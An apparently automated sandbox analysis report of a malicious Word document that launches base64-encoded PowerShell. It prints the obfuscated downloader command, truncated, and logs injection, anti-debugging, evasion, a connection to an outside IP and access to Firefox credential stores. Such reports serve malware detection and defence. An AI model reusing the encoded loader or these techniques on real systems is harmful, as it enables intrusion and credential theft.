Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERShell -e WwBzAHQAUgBJAG4ARwBdADoAOgBKAE8AaQBuACgAIAAnACcALAAoACgAIAAzADYAIAAsACAAMQAxADkAIAAsADEAMQA1ACwAIAA5ADkALAAgADEAMQA0ACAALAAxADAANQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsADMAMgAsACAANgAxACAALAAgADMAMgAsACAAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAsACAANAA1ACAALAAgADEAMQAxACwAIAA5ADgAIAAsACAAMQAwADYAIAAsACAAMQAwADEAIAAsACAAOQA5ACAALAAxADEANgAgACwAIAAzADIAIAAsACAANAA1ACAALAA2ADcALAAxADEAMQAsADEAMAA5ACwAIAA3ADkALAAgADkAOAAsACAAMQAwADYALAAgADEAMAAxACAALAAgADkAOQAgACwAIAAxADEANgAsADMAMgAsACAAOAA3ACAALAAgADgAMwAsACAAOQA5ACAALAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADIALAAxADEANgAgACwAIAA0ADYALAA4ADMAIAAsACAAMQAwADQAIAAsACAAMQAwADEALAAxADAAOAAgACwAIAAxADAAOAAsADUAOQAgACwAMwA2ACwAIAAxADEAOQAgACwAMQAwADEALAA5ADgAIAAsACAAOQA5ACwAIAAxADAAOAAgACwAIAAxADAANQAgACwAMQAwADEALAAgADEAMQAwACAALAAgADEAMQA2ACwAMwAyACAALAAgADYAMQAgACwAMwAyACwAIAAxADEAMAAsACAAMQAwADEALAAxADEAOQAsADQANQAgACwAIAAxADEAMQAsACAAOQA4ACAALAAxADAANgAgACwAMQAwADEAIAAsACAAOQA5ACAALAAgADEAMQA2ACwAMwAyACAAL
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded [stRInG]::JOin( '',(( 36 , 119 ,115, 99, 114 ,105 , 112 ,116 ,32, 61 , 32, 110, 101 ,119, 45 , 111, 98 , 106 , 101 , 99 ,116 , 32 , 45 ,67,111,109, 79, 98, 106, 101 , 99 , 116,32, 87 , 83, 99 ,114, 105 , 112,116 , 46,83 , 104 , 101,108 , 108,59 ,36, 119 ,101,98 , 99, 108 , 105 ,101, 110 , 116,32 , 61 ,32, 110, 101,119,45 , 111, 98 ,106 ,101 , 99 , 116,32 ,83 ,121, 115 ,116 ,101 , 109 , 46, 78,101, 116 ,46,87 ,101 ,98 , 67 , 108, 105 , 101 , 110,116 , 59, 36, 114 ,97,110,100, 111 , 109, 32, 61 ,32 , 1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Base64 decoded [stRInG]::JOin( '',(( 36 , 119 ,115, 99, 114 ,105 , 112 ,116 ,32, 61 , 32, 110, 101 ,119, 45 , 111, 98 , 106 , 101 , 99 ,116 , 32 , 45 ,67,111,109, 79, 98, 106, 101 , 99 , 116,32, 87 , 83, 99 ,114, 105 , 112,116 , 46,83 , 104 , 101,108 , 108,59 ,36, 119 ,101,98 , 99, 108 , 105 ,101, 110 , 116,32 , 61 ,32, 110, 101,119,45 , 111, 98 ,106 ,101 , 99 , 116,32 ,83 ,121, 115 ,116 ,101 , 109 , 46, 78,101, 116 ,46,87 ,101 ,98 , 67 , 108, 105 , 101 , 110,116 , 59, 36, 114 ,97,110,100, 111 , 109, 32, 61 ,32 , 1
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\System32\wlangdi.exeThread register set: target process: 3592

Anti Debugging:

barindex
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004F1D8F VirtualAlloc,memcpy,memcpy,LoadLibraryA,GetProcAddress,VirtualFree,4_2_004F1D8F
Contains functionality to read the PEBShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004F1B03 mov eax, dword ptr fs:[00000030h]4_2_004F1B03
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 5_2_003E1B03 mov eax, dword ptr fs:[00000030h]5_2_003E1B03
Source: C:\Windows\System32\wlangdi.exeCode function: 6_2_002E1B03 mov eax, dword ptr fs:[00000030h]6_2_002E1B03
Source: C:\Windows\System32\wlangdi.exeCode function: 7_2_002E1B03 mov eax, dword ptr fs:[00000030h]7_2_002E1B03
Source: C:\Windows\System32\QYIyP.exeCode function: 8_2_00511B03 mov eax, dword ptr fs:[00000030h]8_2_00511B03
Source: C:\Windows\System32\QYIyP.exeCode function: 9_2_00A01B03 mov eax, dword ptr fs:[00000030h]9_2_00A01B03
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004F924D EntryPoint,GetProcessHeap,RtlAllocateHeap,memset,GetProcessHeap,HeapFree,ExitProcess,4_2_004F924D
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Checks the free space of harddrivesShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\QYIyP.exeFile Volume queried: C:\ FullSizeInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEThread delayed: delay time: 200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Found large amount of non-executed APIsShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\wlangdi.exeAPI coverage: 6.7 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3204Thread sleep time: -922337203685477s >= -60s
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exe TID: 3308Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3368Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\QYIyP.exe TID: 3440Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3512Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3596Thread sleep time: -5000s >= -60s
Source: C:\Windows\System32\wlangdi.exe TID: 3604Thread sleep time: -500s >= -60s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 3896Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbem\WmiApSrv.exe TID: 3960Thread sleep time: -120000s >= -60s
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\System32\QYIyP.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_8-9703
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-9298
Source: C:\Windows\System32\wlangdi.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_6-9956

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlangdi.exeProcess information set: FAILCRITICALERRORS and NOOPENFILEERRORBOX
Document contains OLE streams with high entropy indicating encrypted embedded contentShow sources
Source: new order upcoming.docStream path 'Data' entropy: 7.98881108447 (max. 8.0)
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 69.195.124.165 80
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 7080
Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49169

Language, Device and Operating System Detection:

barindex
Contains functionality to query the account / user nameShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004E1B0D GetUserNameA,GetComputerNameA,GetComputerNameA,GetComputerNameExA,GetComputerNameExA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,CreateFileA,CloseHandle,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcmpA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CreateFileA,CloseHandle,CreateFileA,CloseHandle,CreateFileA,CloseHandle,4_2_004E1B0D
Contains functionality to query windows versionShow sources
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeCode function: 4_2_004F82E6 RtlGetVersion,GetNativeSystemInfo,4_2_004F82E6
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\HERBBL~1\AppData\Local\Temp\39530.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\QYIyP.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation
Source: C:\Windows\System32\wlangdi.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wlangdi.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation
Source: C:\Windows\System32\wlangdi.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation
Source: C:\Windows\System32\wlangdi.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
